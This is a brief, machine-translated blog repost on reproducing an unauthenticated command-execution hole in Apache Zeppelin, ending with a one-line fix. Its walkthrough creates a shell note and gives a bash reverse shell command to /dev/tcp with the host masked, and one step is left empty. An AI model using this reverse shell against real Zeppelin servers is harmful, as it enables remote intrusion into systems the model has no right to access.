Zeppelin unauthorized access to getshell - Code World

Zeppelin unauthorized access to getshell

Others 2021-03-21 14:02:29 views: null

0x00 Preface

Apache Zeppelin is a web-based notebook that makes interactive data analysis feasible. Zeppelin provides a framework for data visualization.

Zeppelin is a web-based notebook that provides interactive data analysis. It is convenient for you to make exquisite documents that are data-driven, interactive, and collaborative, and supports multiple languages, including Scala (using Apache Spark), Python (Apache Spark), SparkSQL, Hive, Markdown, Shell, etc.

0x01 Vulnerability recurrence

The main reason is that unauthorized command execution loopholes are brought about. Direct dry goods to operate:

1、Create New Note：

To perform Linux bounce, use sh.

2. Execute the rebound command

bash -i &>/dev/tcp/xxxxxxx/xxxxx <&1

3. Or directly execute the command:

0x02 repair suggestion

Prohibit unauthorized access to anonymous accounts

Please indicate: Adminxe's Blog » Zeppelin unauthorized access to getshell

Guess you like

Origin blog.csdn.net/Adminxe/article/details/115029325

Zeppelin unauthorized access to getshell

Using Redis Unauthorized Vulnerability to Realize Getshell

Memcached Unauthorized Access Vulnerability

LDAP unauthorized access

rsync unauthorized access

Finishing unauthorized access

Redis unauthorized access reproduction

ES unauthorized access

What is unauthorized access vulnerability

OAuth2.0 unauthorized access

Unauthorized code audit of access and repair

Redis unauthorized access to the attack process

Redis unauthorized access to bounce shell

Redis unauthorized access to bounce shell

Logic Vulnerability Mining for Unauthorized Access

Zookeeper unauthorized access vulnerability exploit

Redis unauthorized access vulnerability recurrence

springboot unauthorized vulnerability (vulnerability reappears Springboot unauthorized access and repair)

Micro-channel interface development - unauthorized access

Memcache unauthorized access to a simple fix vulnerabilities

JustAuth 1.13.0 release, the new Twitter unauthorized access

JBOSS Unauthorized Access Vulnerability reproduction study

MongoDB Unauthorized Access Vulnerability reproduction study

ZooKeeper Unauthorized Access Vulnerability reproduction study

centos install mysql 5.7 and unauthorized remote access

Redis unauthorized access to and use of the vulnerability protection

redis Unauthorized Access Vulnerability reproduction study

redis database from unauthorized access -SSRF

Jupyter Notebook unauthorized access vulnerability simply reproduces

Unauthorized access-Principles and actual combat

Recommended

Ranking

Tomcat plugin config

And a method of binding non-binding

Simulink model of permanent magnet synchronous motor control system based on FOC directional control

Converting struct to bytes in Rust

The 3 "no"s about gene editing in the Civil Code

Less than or greater escape MyBatis

The first article of 23 design patterns in java development

(9) String

The relationship between CPU, memory and cache in the computer

Remember a production accident: 300,000 orders are gone!

Daily

More

2024-07-23(0)

2024-07-22(0)

2024-07-21(0)

2024-07-20(0)

2024-07-19(0)

2024-07-18(0)

2024-07-17(0)

2024-07-16(0)

2024-07-15(0)

2024-07-14(0)